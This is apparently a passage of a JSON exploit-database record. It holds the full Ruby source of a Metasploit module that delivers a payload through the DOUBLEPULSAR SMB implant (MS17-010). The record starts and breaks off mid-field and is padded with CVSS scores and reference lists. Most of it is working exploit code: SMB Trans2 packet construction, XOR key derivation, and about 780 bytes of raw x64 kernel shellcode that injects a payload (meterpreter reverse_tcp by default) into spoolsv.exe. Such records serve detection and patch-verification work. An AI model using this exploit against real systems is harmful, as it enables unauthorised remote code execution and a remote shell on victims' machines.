\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-30] #"}, "lastseen": "2021-10-29T22:21:24", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e199937a24f9682ba634f28c03416368", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-30T23:13:26", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-30T23:13:26", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-30T23:13:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-31] #"}, "lastseen": "2021-10-30T23:13:26", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "855f156e6fc61297b06d7c3cd1dc7671", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": 